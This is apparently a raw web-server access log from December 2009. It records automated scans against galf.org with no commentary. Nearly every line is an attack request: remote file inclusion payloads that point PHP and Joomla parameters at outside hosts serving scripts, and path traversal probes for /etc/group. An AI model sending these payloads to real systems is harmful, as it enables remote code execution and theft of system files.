74.63.15.102 - - [20/Dec/2009:22:00:38 -0800] "GET /index.php?site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:22:00:38 -0800] "GET /logs/index.php?site=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:22:00:38 -0800] "GET /index.php?site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.63.15.102 - - [20/Dec/2009:22:00:38 -0800] "GET /logs/index.php?site=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:22:02:45 -0800] "GET /logs/errors.php?error=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:22:02:45 -0800] "GET /logs/access_090706.log/errors.php?error=http://vostokmedia.com//files/Image/17/id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:22:04:55 -0800] "GET /logs/access_090921.log/index.php?doc=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:40 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:40 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:40 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:53 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:53 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:06:53 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:08:28 -0800] "GET /logs/access.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [20/Dec/2009:22:08:28 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [20/Dec/2009:22:08:28 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
81.174.65.34 - - [20/Dec/2009:22:10:02 -0800] "GET /logs/test.php?page=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:22:10:02 -0800] "GET /test.php?page=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:22:10:03 -0800] "GET /logs/test.php?page=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:22:10:03 -0800] "GET /test.php?page=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:13:25 -0800] "GET /logs/access.log%20//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
90.182.36.30 - - [20/Dec/2009:22:14:15 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:14:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:14:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:14:58 -0800] "GET /logs/access_090921.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:15:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:15:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:22:15:29 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:14 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:14 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:14 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:21 -0800] "GET /logs/access_090928.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:22 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:22:17:22 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:35 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:35 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:35 -0800] "GET /logs/access_090928.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:35 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.158 - - [20/Dec/2009:22:19:40 -0800] "GET /logs/access_090615.log HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:47 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:47 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:47 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:19:47 -0800] "GET /logs/access_090928.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:19:54 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [20/Dec/2009:22:19:54 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [20/Dec/2009:22:19:54 -0800] "GET /logs/access.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
209.97.212.123 - - [20/Dec/2009:22:20:16 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:22:20:16 -0800] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:20:25 -0800] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:20:25 -0800] "GET /logs/access_091012.log//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:20:25 -0800] "GET /administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:38 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:38 -0800] "GET /logs/access.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:38 -0800] "GET /logs/access_090831.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_091116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_090713.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_090803.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_090921.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:44 -0800] "GET /logs/access_090629.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:55 -0800] "GET /logs/access_090928.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:55 -0800] "GET /logs/access_091109.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:21:55 -0800] "GET /logs/access_090720.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:22:42 -0800] "GET /logs/access_090928.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:22:42 -0800] "GET /logs/access_091109.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.234.21.178 - - [20/Dec/2009:22:23:13 -0800] "GET /logs/access_091012.log//e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
218.234.21.178 - - [20/Dec/2009:22:23:13 -0800] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
218.234.21.178 - - [20/Dec/2009:22:23:13 -0800] "GET /e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
203.253.28.220 - - [20/Dec/2009:22:23:22 -0800] "GET /logs/access_090706.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://henry14.isfreeweb.com/zboard/id/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [20/Dec/2009:22:23:59 -0800] "GET /logs/access.log%20//administrator/index.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
209.97.212.123 - - [20/Dec/2009:22:24:48 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:22:24:48 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
174.120.220.131 - - [20/Dec/2009:22:25:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/idosyris.txt???? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.220.131 - - [20/Dec/2009:22:25:21 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.220.131 - - [20/Dec/2009:22:25:21 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
174.120.220.131 - - [20/Dec/2009:22:25:26 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /logs/access.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /logs/access.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:27:22 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:27:27 -0800] "GET /logs/access_091012.log//e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:27:27 -0800] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
125.160.17.200 - - [20/Dec/2009:22:27:27 -0800] "GET /e404.php?INCLUDE_FOLDER=http://www.columbuskumc.org/eBook.pdf?? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
174.120.220.131 - - [20/Dec/2009:22:29:20 -0800] "GET /logs/access_091130.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/idosyris.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:14 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:14 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:14 -0800] "GET /logs/access_090706.log%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:17 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:17 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:17 -0800] "GET /logs/access_090928.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:20 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:22 -0800] "GET /logs/access_091005.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:22 -0800] "GET /setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:22 -0800] "GET /logs//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.231.240.106 - - [20/Dec/2009:22:30:22 -0800] "GET /logs/access_090928.log//setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:18 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:18 -0800] "GET /logs/access_091109.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:18 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:32 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:32 -0800] "GET /logs/access_091109.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:33:32 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:19 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:19 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:19 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:21 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:21 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:23 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:23 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:23 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:25 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:25 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.126.154.177 - - [20/Dec/2009:22:34:25 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:26 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:26 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:26 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:26 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:26 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.236.129.29 - - [20/Dec/2009:22:34:26 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:29 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
99.198.118.186 - - [20/Dec/2009:22:34:29 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.216.127.211 - - [20/Dec/2009:22:34:31 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://esboxvps.com/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.142.120.149 - - [20/Dec/2009:22:34:31 -0800] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
